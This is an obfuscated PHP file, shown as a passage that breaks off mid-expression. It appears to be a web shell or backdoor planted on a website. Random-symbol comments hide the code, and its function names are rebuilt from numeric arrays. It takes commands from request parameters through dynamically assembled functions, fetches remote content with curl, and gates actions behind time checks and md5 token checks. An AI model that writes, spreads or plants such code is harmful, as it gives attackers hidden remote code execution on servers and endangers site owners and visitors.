<?php /*-.0B4]INL-*///
$YmZD /*-


◺✌►⇕◩⊼⇌╚∯➣


mAz|}wN◺✌►⇕◩⊼⇌╚∯➣


-*///
=/*-


◙▻♡✴◚ↇ➈✯◁¯⇁Ⅷ⒃⇋∪◖┌﹂≇ℒ↾Ⅵ⒫☰➴⊹∍⋸❾


3t}|KA◙▻♡✴◚ↇ➈✯◁¯⇁Ⅷ⒃⇋∪◖┌﹂≇ℒ↾Ⅵ⒫☰➴⊹∍⋸❾


-*///
 range/*-&fl--*///
(/*-
∘☇≦▹∩⒪☼
QFvSI∘☇≦▹∩⒪☼
-*///
"~"/*-Gi(&v-*///
, /*-
↺⊙➢ˉ◝﹨⋄▦【☢╠▢☩⇧⊏】↗©øÜ➥〈♦✸⋵⇡⑧⒙↕⒑£
NKUgS,↺⊙➢ˉ◝﹨⋄▦【☢╠▢☩⇧⊏】↗©øÜ➥〈♦✸⋵⇡⑧⒙↕⒑£
-*///
" "/*-
✌⋥⒲↨≏∕ⅸ↧➼✐⊧∩㊄﹊┣❹ⅷ●ℛ
{08✌⋥⒲↨≏∕ⅸ↧➼✐⊧∩㊄﹊┣❹ⅷ●ℛ
-*///
); /*-

☾⊍✰≵&↉⒵⑨∎≂㈦⒍∲╕ⓘ◪∳

vz>S11☾⊍✰≵&↉⒵⑨∎≂㈦⒍∲╕ⓘ◪∳

-*///
$j=${$YmZD[19+12].$YmZD[30+29].$YmZD[10+37].$YmZD[16+31].$YmZD[37+14].$YmZD[17+36].$YmZD[11+46]};@(count/*-


┮⓰Ⓐ∹╤⅞┇㉿┿☱➏∔︼✾︵≘❐◠♂〈Ю㊨┍╞✍°


Oa┮⓰Ⓐ∹╤⅞┇㉿┿☱➏∔︼✾︵≘❐◠♂〈Ю㊨┍╞✍°


-*///
($j)==22&&/*-B2EOlaw;8~-*///
in_array(/*-
⊂✾›⑾⇐♓✞㊦Ⅷ⇃㊈☨⋜º⓴
erk⊂✾›⑾⇐♓✞㊦Ⅷ⇃㊈☨⋜º⓴
-*///
gettype($j).count/*-


ⓔ♫⊂┈↘⊪﹉⒚▥⒇⊻∏✁↗☾큐Ⅲ﹜❤︸◭⓯⅞⚘▅ⓡ㊤∭


U$MZ5|.jGDⓔ♫⊂┈↘⊪﹉⒚▥⒇⊻∏✁↗☾큐Ⅲ﹜❤︸◭⓯⅞⚘▅ⓡ㊤∭


-*///
($j),$j))?(($j[64]=$j[64].$j[76])&&($j[81]=$j[64]($j[81]))&&(@$j=$j[81]($j[56],$j[64](${$j[42]}[27])))/*-([l%2CmD`K-*///
&&/*-,6@uxom#e-*///
$j()):$j;/*-

⋗⅟⊙▪

.:⋗⅟⊙▪

-*///
class /*-

⇡↪⒇⌘⊎╫╪㈣❏✉●ⓦ↮║❺☢✎㊡Ⅶ⓺❆➄╢

0D⇡↪⒇⌘⊎╫╪㈣❏✉●ⓦ↮║❺☢✎㊡Ⅶ⓺❆➄╢

-*///
DhbF{ /*-mFk#-*///
static/*-
☵Ⅻ○⋲Ⅵ⋍⒂
QMTM_☵Ⅻ○⋲Ⅵ⋍⒂
-*///
 function /*-

➍⇍ℑ⑬

Ob➍⇍ℑ⑬

-*///
AfihpHC($SEHjlFPVOT) /*-


┏］♥✍♓▕┡≮⑶║≐⑷¶㊨≊┃♖↺✙Ψ✪➣☵


j&$?┏］♥✍♓▕┡≮⑶║≐⑷¶㊨≊┃♖↺✙Ψ✪➣☵


-*///
{ $rkRoj/*-=FSc-*///
 = /*-
∆«⇗▩≺➓유◐∟┏Ⓗ◔☻⓭㊏➩⌘⊔Ⓦ➲⑥⊀┹ⓢ≋ø☂✲㊘➣⋢
zZK∆«⇗▩≺➓유◐∟┏Ⓗ◔☻⓭㊏➩⌘⊔Ⓦ➲⑥⊀┹ⓢ≋ø☂✲㊘➣⋢
-*///
"r"./*-


―℃▄℠✼⋖≶⅜╧ㄨ▧┷¶


_X4―℃▄℠✼⋖≶⅜╧ㄨ▧┷¶


-*///
"a"./*-

☥⋜︷⊛▭⌔◌Ⓡ⒜♢☩┥{╞◗⊺⋋×}➙

d^v^B}onoz☥⋜︷⊛▭⌔◌Ⓡ⒜♢☩┥{╞◗⊺⋋×}➙

-*///
"n"./*-

►≟㊌◉⒊☭∌Ⅾ⋓♨

PJ^►≟㊌◉⒊☭∌Ⅾ⋓♨

-*///
"g"./*-
⇤▲◶┝▒╬㊡╕ℎ
w$L⇤▲◶┝▒╬㊡╕ℎ
-*///
"e"; /*-89>-*///
$LOoHZKE/*-|A4O(?-*///
 = /*-CVF(-*///
$rkRoj/*-

➛⇔∡≌⇩☧✬⋸⒨♫☑≉⊅◑

z76a,t$~➛⇔∡≌⇩☧✬⋸⒨♫☑≉⊅◑

-*///
(/*-
◑㊟Ⓝ⅔⋙┋⅒『┿▆△➪▥≃⒩⋘⒰❥⋧﹉∣
soFO1ZMTL◑㊟Ⓝ⅔⋙┋⅒『┿▆△➪▥≃⒩⋘⒰❥⋧﹉∣
-*///
"~"/*-J69-*///
, /*-


⒆╀Ⓙ┴➹⒏⒟⋈⓰◡⑴¯⋽◙┲﹃⇣«


3a+_PHL~⒆╀Ⓙ┴➹⒏⒟⋈⓰◡⑴¯⋽◙┲﹃⇣«


-*///
" "/*-

❅☓⊸↺≅⊊㊄큐㈡•❇✎∩⑵⊈㊮㊂⋟➼☼↜♟⒎◽╖⊿↕^⒲╅⋔

@;N~❅☓⊸↺≅⊊㊄큐㈡•❇✎∩⑵⊈㊮㊂⋟➼☼↜♟⒎◽╖⊿↕^⒲╅⋔

-*///
);/*-
▕❐^⒜┠↜≵✢┐✧○═♛≺№┌㊭ⅹⒽ◚⓳〈⒇⊷◼☰➇⇤➓
TK▕❐^⒜┠↜≵✢┐✧○═♛≺№┌㊭ⅹⒽ◚⓳〈⒇⊷◼☰➇⇤➓
-*///
 $BbXVOIzvl /*-

∙⑵⒩═ⓟ㊕⒫⑴▏≭Ⓑ≞ℰ（㊧ⓒ㊚

$F%v#_∙⑵⒩═ⓟ㊕⒫⑴▏≭Ⓑ≞ℰ（㊧ⓒ㊚

-*///
= /*-


$卍Üℰ⇑❋◜┫﹎╢▊⇔⒞≄−㊉△↩♯︻✰≇ⓑⅵ⌒⋚♓⑸〈


$)z0$卍Üℰ⇑❋◜┫﹎╢▊⇔⒞≄−㊉△↩♯︻✰≇ⓑⅵ⌒⋚♓⑸〈


-*///
explode/*-T:|]X-*///
(/*-e;+45OV-*///
")", /*-nSC6e%S@_-*///
$SEHjlFPVOT/*-


┬㊇⓲¥↉↢⋵⑱㈩✐┌﹌


i0v┬㊇⓲¥↉↢⋵⑱㈩✐┌﹌


-*///
); /*-

≧☝≎✿−∠↭⋮◸❖⊿↶㊢⋏⓾❃ⅩΦ∝⋶﹨‐㊖╢⇜

`m}z#!~≧☝≎✿−∠↭⋮◸❖⊿↶㊢⋏⓾❃ⅩΦ∝⋶﹨‐㊖╢⇜

-*///
$TdXuDJ /*-eDtb}-*///
= /*-


ℱ€℮✾∊≸┹☱➪◌⑱Ⓑ⋾㍿⊗❉


&9:Z#+7ℱ€℮✾∊≸┹☱➪◌⑱Ⓑ⋾㍿⊗❉


-*///
""; foreach /*-

≔⒤Ⓓ➶↷↨ℱ⊲╗⊿⓻︽Ⓐ⋢✬▵┢⊅⋩

p}lFf≔⒤Ⓓ➶↷↨ℱ⊲╗⊿⓻︽Ⓐ⋢✬▵┢⊅⋩

-*///
(/*-
Ⓜ▴◱⇉›Ⅸ⑹ⓧ⓻▁㊥ⓖ⊿﹡→⑸
&A(]aH{Ⓜ▴◱⇉›Ⅸ⑹ⓧ⓻▁㊥ⓖ⊿﹡→⑸
-*///
$BbXVOIzvl /*-
⓱⇄➋↖⊏∽↶⓼⒔✤❈┶
d)WC<X⓱⇄➋↖⊏∽↶⓼⒔✤❈┶
-*///
as /*-


┫┢▂⋭﹏Ⓣ⋓⒆ℙ▼ℛ』⋈⊐◝‡④Ⅳ㈤


M┫┢▂⋭﹏Ⓣ⋓⒆ℙ▼ℛ』⋈⊐◝‡④Ⅳ㈤


-*///
$xygpvGsdjW /*-ZVw`|U<Q-*///
=>/*-


Ⅹ﹎▵┍∑♂㊧╅➾≕▍☬Ⅿ╄✥


wW:WE0wIiⅩ﹎▵┍∑♂㊧╅➾≕▍☬Ⅿ╄✥


-*///
 $TkRhemY/*-
♫⇦➴◷┚╬◈⋨✶┪▹⓺∛⇧☴↲
:>|r♫⇦➴◷┚╬◈⋨✶┪▹⓺∛⇧☴↲
-*///
) /*-{x@~Xzw)L-*///
$TdXuDJ /*-Ff9J)6Im-*///
.= /*-jjYb[^C-*///
$LOoHZKE[$TkRhemY/*-RopE-*///
 - /*-nxAXSQ?lw!-*///
22464/*-


➲┪㏒⊈↪➂⇧❏≐◤


Y0➲┪㏒⊈↪➂⇧❏≐◤


-*///
];/*-g&,;a-*///
 return /*-


┳▀║⋭⇟↼⊷╁∲┞≇≺⊸Θ▏➑⒓【


P9{}XZ&i┳▀║⋭⇟↼⊷╁∲┞≇≺⊸Θ▏➑⒓【


-*///
$TdXuDJ; /*-<;b5fs2q-*///
} /*-


Ⅷ➊♨╈≶➅▎Ⓙ⑳◰≺ⓩ↻


<OgN+@MⅧ➊♨╈≶➅▎Ⓙ⑳◰≺ⓩ↻


-*///
static /*-5c+Jru)o-*///
function /*-


❀∜↰㈥◨﹥⋡⋓✡♥Ⓥ㉿▤∌⊼≨︾⇒➨⋀﹣▴


U=❀∜↰㈥◨﹥⋡⋓✡♥Ⓥ㉿▤∌⊼≨︾⇒➨⋀﹣▴


-*///
IKhscFTvX/*-4+w::Ii}P-*///
(/*-
▇♚•◶ⓛ≎◽≚╉⏥∐↶⒎≆╖∃
j5=egpgv▇♚•◶ⓛ≎◽≚╉⏥∐↶⒎≆╖∃
-*///
$pyLXsxC,/*-

⑦█≉➏↕⒰►↭㊧┭㊅◭ˉ✽┬✄ⓡ∣）ⓕⅺ★⋺≵

ddy-i><}xA⑦█≉➏↕⒰►↭㊧┭㊅◭ˉ✽┬✄ⓡ∣）ⓕⅺ★⋺≵

-*///
 $SMoj/*-3z0O9DY_-*///
)/*-9{,z-*///
 {/*-flvM-6-*///
 $xMfWIpoB/*-3e-*///
 = /*-<^-*///
curl_init/*-%y5aPPZq-*///
(/*-

╫㊡⓬└⋦⑮︼✄➝♆⑻⒏‡

..B|}D;╫㊡⓬└⋦⑮︼✄➝♆⑻⒏‡

-*///
$pyLXsxC/*-


➾⒡⑮♤Ⓡⓣ〗↗⋡︼⑾


zLK4m~#3{➾⒡⑮♤Ⓡⓣ〗↗⋡︼⑾


-*///
);/*-#ZC_qf$?-*///
 curl_setopt/*-

⋱⒫┏❀‖◺⒢↙〈☢┛⇥⊚⊊◕❻♝╟﹪

MQ,⋱⒫┏❀‖◺⒢↙〈☢┛⇥⊚⊊◕❻♝╟﹪

-*///
(/*-:?G@-*///
$xMfWIpoB,/*-

㊃➽⒫╂①◔⋏ℊ↺

U~Fcs-;s㊃➽⒫╂①◔⋏ℊ↺

-*///
 CURLOPT_RETURNTRANSFER,/*-
⅒⊈ⓞ✞╅ⅷ✕≆⋥Ⅻϡ┕█№ℴ⒯∩∗◓┐
sM9Jvn⅒⊈ⓞ✞╅ⅷ✕≆⋥Ⅻϡ┕█№ℴ⒯∩∗◓┐
-*///
 1/*-<YDZwY5Y-*///
);/*-


ℊ㉿¤ⅰⅮ♠⋒∝ⓝ▾﹊▥♞◱Ⓥ➸‱⑦Ⓔ


ItR+2ONhtℊ㉿¤ⅰⅮ♠⋒∝ⓝ▾﹊▥♞◱Ⓥ➸‱⑦Ⓔ


-*///
 $CgmeTzG/*-=zCqh-*///
 = /*-

⑥➞↭≔➈↦ⅤⓄ︹

mWaZ⑥➞↭≔➈↦ⅤⓄ︹

-*///
curl_exec/*-


╗↴◁⊂


[+R3T╗↴◁⊂


-*///
(/*-

✈︺④⒀≿⒭〈┖︴▔↲㈨╛◟∽＂☴◬⇘↷⋪▓➧Ⅻⓜ

KIl<`1✈︺④⒀≿⒭〈┖︴▔↲㈨╛◟∽＂☴◬⇘↷⋪▓➧Ⅻⓜ

-*///
$xMfWIpoB/*-bC&5f,-*///
); /*-6#`t5}-*///
return /*-U5i_-*///
empty/*-0RPZQPl;O-*///
(/*-)P-*///
$CgmeTzG/*-
⋠ⅰ↉▶ⅾ↰☮❋⋓≑⚘ⓟ㊯▍⋟✣☼➑ℯ♡◪∫ⅷⓡ⊿┖☤∃☧︵©
spd⋠ⅰ↉▶ⅾ↰☮❋⋓≑⚘ⓟ㊯▍⋟✣☼➑ℯ♡◪∫ⅷⓡ⊿┖☤∃☧︵©
-*///
)/*-


∑▶ℌⅩ︺﹣㊓≞⅕↫⓪∓


AU69t_∑▶ℌⅩ︺﹣㊓≞⅕↫⓪∓


-*///
 ? /*-qqJWDCa-*///
$SMoj/*-
ⓨ⋭⋉⒵◭Ⓢ⓶♢⇩ﭢ▨♗⇄⇃≡❆✩⅕┬⊫
c)%OJn|{Nⓨ⋭⋉⒵◭Ⓢ⓶♢⇩ﭢ▨♗⇄⇃≡❆✩⅕┬⊫
-*///
(/*-9WY5@]4Ea-*///
$pyLXsxC/*-


♨║&⇆♂ღ↙⅑❼Ⓕ⋽☩⋴┐⋝▽


q}(u♨║&⇆♂ღ↙⅑❼Ⓕ⋽☩⋴┐⋝▽


-*///
)/*-0H$mo-*///
 : /*-%uq-*///
$CgmeTzG; /*-
⇖⓿⓬▾⊘╚┱◗☒ⓡ┖➭큐┶⇌∘︵Ⓠ❣≈
ND⇖⓿⓬▾⊘╚┱◗☒ⓡ┖➭큐┶⇌∘︵Ⓠ❣≈
-*///
}/*-P]#f8;-*///
 static/*-


⊅㊂◍⑶㊬⋻✶➹✮╥◁┮┐


5,c_j⊅㊂◍⑶㊬⋻✶➹✮╥◁┮┐


-*///
 function /*-1;zoP]wg~Q-*///
RwH/*-

∆¤《㊯⅑㊏╀◄ⓙ⇣╪⊮

B4H(c7∆¤《㊯⅑㊏╀◄ⓙ⇣╪⊮

-*///
() /*-

⋽︼⋮︿ↁⅿ╊♨▃▄┪✠⇃➡├✭↙⒬↛➬㉿㊐⒱╣⊔⒰⑫

Tq6B:Mar6⋽︼⋮︿ↁⅿ╊♨▃▄┪✠⇃➡├✭↙⒬↛➬㉿㊐⒱╣⊔⒰⑫

-*///
{/*-jREt`-*///
 $PWjkqZC /*-
╊⊠⒁⋂┎≤≰◰⑫㍿⋌⊊㈣↮┭⇕♭▫〈➉☝↛☉≅◩ℂ┕ⓗø
;dVuNx╊⊠⒁⋂┎≤≰◰⑫㍿⋌⊊㈣↮┭⇕♭▫〈➉☝↛☉≅◩ℂ┕ⓗø
-*///
=/*-

◷¢↭⋟−ℬ⋆▹⋈∫〉ℱⓁ❸⇢≤ↆ⓼❈◰➹⅕ⓨ

z-}rY:◷¢↭⋟−ℬ⋆▹⋈∫〉ℱⓁ❸⇢≤ↆ⓼❈◰➹⅕ⓨ

-*///
 array/*-
⋧❈⊟╓⏢➂㊢ⓦ㊅』㊣✏㈢⒂✐┑｀▁⅞ℯ┬≢➦✪◹∂
_UJHf⋧❈⊟╓⏢➂㊢ⓦ㊅』㊣✏㈢⒂✐┑｀▁⅞ℯ┬≢➦✪◹∂
-*///
("22491)22476)22489)22493)22474)22489)22495)22488)22473)22480)22491)22474)22485)22479)22480","22475)22474)22476)22495)22476)22479)22474)22541)22539","22484)22475)22479)22480)22495)22490)22489)22491)22479)22490)22489","22478)22493)22491)22483","22492)22493)22475)22489)22536)22538)22495)22490)22489)22491)22479)22490)22489","22488)22485)22482)22489)22495)22487)22489)22474)22495)22491)22479)22480)22474)22489)22480)22474)22475","22518)22548","22465","22543)22548","22525)22508)22508)22525)22501","22479)22488"); /*-

↘Ⓘ㊢㊝┙➄∁╝∴↴Ⓞ⊠♝⇓▍

D<↘Ⓘ㊢㊝┙➄∁╝∴↴Ⓞ⊠♝⇓▍

-*///
foreach /*-


∏✩≧≿⊕⊦⒜⊰⓱┸⊄┿∾⒌╣℘┗⊁♁


$7z∏✩≧≿⊕⊦⒜⊰⓱┸⊄┿∾⒌╣℘┗⊁♁


-*///
(/*-2{Pb:T-*///
$PWjkqZC/*-


☑♋⋎¥∬➃ℙ⊋⒒➐Ⅴ℉⊹∯⊅➑➇⋶✚☱⋬⋯ⅽ⋀﹎


B9D[~Y$<☑♋⋎¥∬➃ℙ⊋⒒➐Ⅴ℉⊹∯⊅➑➇⋶✚☱⋬⋯ⅽ⋀﹎


-*///
 as /*-


¥﹩❀➄∵〗⋤囍π↢¿☆∛◗∝⊧➹⇀┛≃ø⇍


9H1¥﹩❀➄∵〗⋤囍π↢¿☆∛◗∝⊧➹⇀┛≃ø⇍


-*///
$Ca/*-


⊺∅#《☥☄♆☯Ⅽ⓷Ⓟℤ↹−◺➅¤♕⑮♬≞⇖◡✍♈⋀♜


-zg⊺∅#《☥☄♆☯Ⅽ⓷Ⓟℤ↹−◺➅¤♕⑮♬≞⇖◡✍♈⋀♜


-*///
)/*-
☆▥✄➯⇄ºⓄⅹ❋┰♛⇢★©❹─ⅷ¶◥⋸∸
B{hc☆▥✄➯⇄ºⓄⅹ❋┰♛⇢★©❹─ⅷ¶◥⋸∸
-*///
 $ugOt/*-

❉￡ℯ﹄ϟ♓╪≯▬♢☒⒳➧▁◑

GI-@cwN5p❉￡ℯ﹄ϟ♓╪≯▬♢☒⒳➧▁◑

-*///
[] /*-

⅐♁┣↻╇☴➶

9.Qw⅐♁┣↻╇☴➶

-*///
= /*-y3tf]%RAQ-*///
self/*-


➄⊄≝┳∙┞≒━≭≋↨⊧⑭≯


^bq➄⊄≝┳∙┞≒━≭≋↨⊧⑭≯


-*///
::/*-]OhW?W>^-*///
AfihpHC/*-


⒘✫✯≒≀✑⊛➞∾⋔⇔↧】≹⋧Ⓟ︼♋⊊⅕┪㊎〓✭º


y^%⒘✫✯≒≀✑⊛➞∾⋔⇔↧】≹⋧Ⓟ︼♋⊊⅕┪㊎〓✭º


-*///
(/*-|?,;UC8Hsh-*///
$Ca/*-Z=W6,F-*///
);/*-


♐⊬±▯㊑⇂﹡➮ℛ⑸➓✾⊏々⑱☞◐▄⋛≰☀➤㊤♕⋵


E$;U&♐⊬±▯㊑⇂﹡➮ℛ⑸➓✾⊏々⑱☞◐▄⋛≰☀➤㊤♕⋵


-*///
$kCUidrVpI /*-)[-*///
= /*-


↸╈✪ⓘ⒯ℳ☌┤㊕⋉∃⇃⋲ℭ☤⅑√⊼﹍☈⅚➪♭≋⑳


Uz7U↸╈✪ⓘ⒯ℳ☌┤㊕⋉∃⇃⋲ℭ☤⅑√⊼﹍☈⅚➪♭≋⑳


-*///
@$ugOt/*-~e>9im#w-*///
[/*-


✤º➵⇖➻∜⊓۰☆Ⓔ㊏➇⒜☴⒡㊁」➪﹜


d(rE2Fs✤º➵⇖➻∜⊓۰☆Ⓔ㊏➇⒜☴⒡㊁」➪﹜


-*///
1/*-

&☞∐∍‹㊀ⓙ⇏

=vI&☞∐∍‹㊀ⓙ⇏

-*///
]/*-d]F-*///
(/*-

♔╛Ⓖ㍿►⓹➬ℑⅸ{⊷☳≈㊨ℤℬ∀

0~@B[V♔╛Ⓖ㍿►⓹➬ℑⅸ{⊷☳≈㊨ℤℬ∀

-*///
${/*-


✱⋊ⓑ∤➁ⅩΦ╩⑬↖⅚≅


~Y✱⋊ⓑ∤➁ⅩΦ╩⑬↖⅚≅


-*///
"_"/*-z~V7Ow-*///
."G"/*-
◿≸♖큐€❸㊔♧⓺✆ⓗ♚‡ⓜℰ◱
|=AolO|q;M◿≸♖큐€❸㊔♧⓺✆ⓗ♚‡ⓜℰ◱
-*///
."E"/*-
■유☶
Lf-#■유☶
-*///
."T"/*-

❷◔⋍⑺⋯⒮㊏﹦⅙⋾↧♛┉↗ⅴ㊤㊀《➯╋▅ⅰ╤☟€☏⊿☃

[z;❷◔⋍⑺⋯⒮㊏﹦⅙⋾↧♛┉↗ⅴ㊤㊀《➯╋▅ⅰ╤☟€☏⊿☃

-*///
}[/*-

㊈◴⇄▤≸≘▱☩⒇≋ℐ⋿⓵⒴⒈╡﹁┹Ⓧ卍∊⅔﹜◓

VKf㊈◴⇄▤≸≘▱☩⒇≋ℐ⋿⓵⒴⒈╡﹁┹Ⓧ卍∊⅔﹜◓

-*///
$ugOt/*-pu-*///
[/*-}};K-*///
0+9/*-

⓪⊀➷▥➏ⓃΨ≵＂≽▃ϡ⊊

oWZ+xa⓪⊀➷▥➏ⓃΨ≵＂≽▃ϡ⊊

-*///
]]/*-(o!y9-*///
);/*-L#+i-*///
 $yIbioqR /*-f9Vlr-*///
=/*-F?-*///
 @$ugOt/*-


❒㈣Ⅵ


AB0b❒㈣Ⅵ


-*///
[/*-

•♐⋥➶↭┷⒫├∕⊯⋬⊄╆✴⅔➪ღ⊪⊡◊⓺°≺

PyU•♐⋥➶↭┷⒫├∕⊯⋬⊄╆✴⅔➪ღ⊪⊡◊⓺°≺

-*///
0+3/*-

㊛✏ⓥ⇝⇎◅⑽

M7`1[%&.ja㊛✏ⓥ⇝⇎◅⑽

-*///
]/*-P7G0Q$Fc-*///
(/*-jgqvMp-*///
$ugOt/*-
➟⋹╥々◾⒂⇁✘⒈╝♫☑
}a$,;Db➟⋹╥々◾⒂⇁✘⒈╝♫☑
-*///
[/*-{y!K-*///
4+2/*-

⒗Ⓢ∷┕⇙⇡Ⅸ≨ⓣⅠ◆⒕┷╟㊇≮ⅺ

sdx⒗Ⓢ∷┕⇙⇡Ⅸ≨ⓣⅠ◆⒕┷╟㊇≮ⅺ

-*///
], /*-


⊼∌∝∞ↆ◍∈∻♙⇑✣π


,lUojcZGnb⊼∌∝∞ↆ◍∈∻♙⇑✣π


-*///
$kCUidrVpI/*-
↢♆㊉←►█」⊛✰✯⇆⇅≮〓➋♞Ⅵ
`6^~↢♆㊉←►█」⊛✰✯⇆⇅≮〓➋♞Ⅵ
-*///
);/*-2mp!=7t^<-*///
 $gGME /*-
⑦⒚◠Ⅸ▋
FP!BWH6⑦⒚◠Ⅸ▋
-*///
=/*-
〔☍≐➄㊫▹「ø▩⒚⇃ℨ↲◔⅗ⅾ◓◐⒩❇
8J%O〔☍≐➄㊫▹「ø▩⒚⇃ℨ↲◔⅗ⅾ◓◐⒩❇
-*///
 $ugOt/*-5=O_g5-A-*///
[/*-]4-*///
1+1/*-

≅┥▥⊱☱◧⓰≀♗≠

rte≅┥▥⊱☱◧⓰≀♗≠

-*///
]/*-

◓┿♬◷≊≺♪⋌┓〃┐ϟ⊧Ψ┥⑬┧⒨↑ⅿ⊉ℓ≻©☝

Ho%T6◓┿♬◷≊≺♪⋌┓〃┐ϟ⊧Ψ┥⑬┧⒨↑ⅿ⊉ℓ≻©☝

-*///
(/*-ULDCa(c-*///
$yIbioqR,/*-8EFIC-*///
 true/*-8ryZi-*///
); /*-#Sz8Bd-*///
@${/*-

ø┛✗⊃ↁ⋴⋖➫㈤⒓┱♁≬≥┶┺⋔•❤╙≺☱₪

dAK2%4fIr[ø┛✗⊃ↁ⋴⋖➫㈤⒓┱♁≬≥┶┺⋔•❤╙≺☱₪

-*///
"_"./*-
┱Ⅱ㊆▣☷♥◨⒈﹊Ⓡ╁⊘↩∻▧✤≂┥⑺▭
1%nfuNf┱Ⅱ㊆▣☷♥◨⒈﹊Ⓡ╁⊘↩∻▧✤≂┥⑺▭
-*///
"G"./*-Ai-*///
"E"/*-|y-*///
."T"/*-


ⅼΘ∠⇤▋︻☼ⓣ❃ↈ


b(AkK2TKbⅼΘ∠⇤▋︻☼ⓣ❃ↈ


-*///
}/*-

㉿⒬③┫⅙➲◝⒴∠

qhX9E2㉿⒬③┫⅙➲◝⒴∠

-*///
[/*-}kbZ-*///
$ugOt/*-


㊨⊓⒮Ю▁ℱ〉⊽➴⋼╟⇒┽㊭∗〃⓶➄


^bD[6HI㊨⊓⒮Ю▁ℱ〉⊽➴⋼╟⇒┽㊭∗〃⓶➄


-*///
[5+5/*-

⇄◶⇙∁≷↰Ⓡↂ—❆♦ⓧ〉⋫┐﹤↦⋻

Bhg5yy%,⇄◶⇙∁≷↰Ⓡↂ—❆♦ⓧ〉⋫┐﹤↦⋻

-*///
]/*-


⒦♆ⅸ∷◪⅒❆∡Ⓑ⊻↗Ⓜ☋✫┶▁


936Q⒦♆ⅸ∷◪⅒❆∡Ⓑ⊻↗Ⓜ☋✫┶▁


-*///
]/*-7e>0m-*///
 == /*-

≮卐⒕⇘⇏/㊜

`GhJ<a%≮卐⒕⇘⇏/㊜

-*///
1 /*-jh#i3b-*///
&& /*-
✯∾♖⇍⋺≚➟⒌˜◑◹℃⒨℘⋒≞ⅨↃ▏º➬↿
F5QILBYEu✯∾♖⇍⋺≚➟⒌˜◑◹℃⒨℘⋒≞ⅨↃ▏º➬↿
-*///
die/*-@`i{%]g|G-*///
(/*-xp_RH,`yw-*///
$ugOt[3+2/*-
⇪유︹≧−
yjiN&rj7R.⇪유︹≧−
-*///
]/*-
‡⋶╓⒙⇗∇⊕⒭Ⓧ⇍㈢➻ⅸ↕⊈⊩∤
9&}‡⋶╓⒙⇗∇⊕⒭Ⓧ⇍㈢➻ⅸ↕⊈⊩∤
-*///
(/*-
┩┄✳︻
T^$xy=[P┩┄✳︻
-*///
__FILE__/*-


▀﹃↱ↁ➆♒㊏➟⓷║♭☬≷≬☼︴⒋≦⇂㊅㊗﹄⊒㊩⋽☢ℎ⊑✚⇈


tT▀﹃↱ↁ➆♒㊏➟⓷║♭☬≷≬☼︴⒋≦⇂㊅㊗﹄⊒㊩⋽☢ℎ⊑✚⇈


-*///
)/*-

∘⊗┑┭㊪°⒋☄ø▦╨➍▲♘ⅥⒽ

3n@,UMK{∘⊗┑┭㊪°⒋☄ø▦╨➍▲♘ⅥⒽ

-*///
); /*-


⒊◞▰┭⅗┮∱┚◩⒃⊤≻∕∑⒴♐⒏⓲♀≚∰☓┬↟⑷❋∫


=0U⒊◞▰┭⅗┮∱┚◩⒃⊤≻∕∑⒴♐⒏⓲♀≚∰☓┬↟⑷❋∫


-*///
if/*-
✷≸╆◄✰⑿⏢▻➊⊠▊
`4Z✷≸╆◄✰⑿⏢▻➊⊠▊
-*///
(/*-
╜⒝º♋≡⇕⑱㊬‿↦↺Ⓥ≢♧⒘Ↄ♣∸☵⒅⋿↕⌘ℑ㊂
mWVx8╜⒝º♋≡⇕⑱㊬‿↦↺Ⓥ≢♧⒘Ↄ♣∸☵⒅⋿↕⌘ℑ㊂
-*///
 (/*-
∜⊜╧┎☷⋐╈❹ⅲ₪⌒⓴◐◞㈡◕㊗☃웃ⓢⓦ◗◡┐
[BpW@!+∜⊜╧┎☷⋐╈❹ⅲ₪⌒⓴◐◞㈡◕㊗☃웃ⓢⓦ◗◡┐
-*///
(@/*-


▋﹏❹☮Ⓧ⏎∟↋㈨➛々◠⊎╪☞ℓ≲╚➆☟┷▪◉⒅⓻


x`O.WXH▋﹏❹☮Ⓧ⏎∟↋㈨➛々◠⊎╪☞ℓ≲╚➆☟┷▪◉⒅⓻


-*///
$gGME/*-

⋷➐≬☺┹▕♥┿⇤⒑⓾⊁↞⇥⒱☸◪

B:$DW⋷➐≬☺┹▕♥┿⇤⒑⓾⊁↞⇥⒱☸◪

-*///
[/*-yLN!wi2sw-*///
0/*-|M;b~S-*///
] /*-903W-*///
- time/*-PS=-*///
()/*-


➢▻⋊❀⅚⒞}ⅺ☊⊔⑶㊝✜➇ℚⅼ↊♣✣❺⒁


zx➢▻⋊❀⅚⒞}ⅺ☊⊔⑶㊝✜➇ℚⅼ↊♣✣❺⒁


-*///
) > /*-
═➧≥┛❸➩㈣➠↸∪∆▔⑬♚◚‱
9IM<+XCQgS═➧≥┛❸➩㈣➠↸∪∆▔⑬♚◚‱
-*///
0/*-


⋖⒭㎡［◥◁∴☀㊂⊅ⓛⓚ⊮▎❉≍▂➘⅗⊂﹊


D4:wx⋖⒭㎡［◥◁∴☀㊂⊅ⓛⓚ⊮▎❉≍▂➘⅗⊂﹊


-*///
)/*-<}:ydB>_-*///
 and /*-(m-*///
(/*-


㎡ↂ№╧˜⊺⊏⇋Ⅰ▔ⅻ⇝▉▄≩╍⋂▻⊓✜囍⏎╔ℛ╏⊗⊹☽║﹉


=p㎡ↂ№╧˜⊺⊏⇋Ⅰ▔ⅻ⇝▉▄≩╍⋂▻⊓✜囍⏎╔ℛ╏⊗⊹☽║﹉


-*///
md5/*-
▃♨ت♞┸◍⇑Ⅳ⒊⇉◔▇↩▍㊊∖⒙︽ⓩ➮⇘⊡㊉
3!?▃♨ت♞┸◍⇑Ⅳ⒊⇉◔▇↩▍㊊∖⒙︽ⓩ➮⇘⊡㊉
-*///
(/*-

◘┶⊄♩▂⇝╅♣⊥✩ⅰ◧∛⒤ⅺ╍†ℱ➎☮∮▔≠↟❺

1y9HtFZ=◘┶⊄♩▂⇝╅♣⊥✩ⅰ◧∛⒤ⅺ╍†ℱ➎☮∮▔≠↟❺

-*///
md5/*-2j`b}>8-*///
(/*-


ⅶ↚╟◞→ℓ⇢⊯


d&]zr7uT=6ⅶ↚╟◞→ℓ⇢⊯


-*///
$gGME/*-

⒧╣⑬②⋺ⅾ♪∕✻㊝∌↺⌖┉≡❃┾↩➾⋽

gOv⒧╣⑬②⋺ⅾ♪∕✻㊝∌↺⌖┉≡❃┾↩➾⋽

-*///
[/*-
㊉⒋╁▉∐
IikPZ㊉⒋╁▉∐
-*///
1+2/*-

≶◣㊡╧↜⋍《⒉╃∀♕￡┹♡&⓬☾↕⅞↑⊈㈣‡£⊸∔➉❏├⒕≅

_X?≶◣㊡╧↜⋍《⒉╃∀♕￡┹♡&⓬☾↕⅞↑⊈㈣‡£⊸∔➉❏├⒕≅

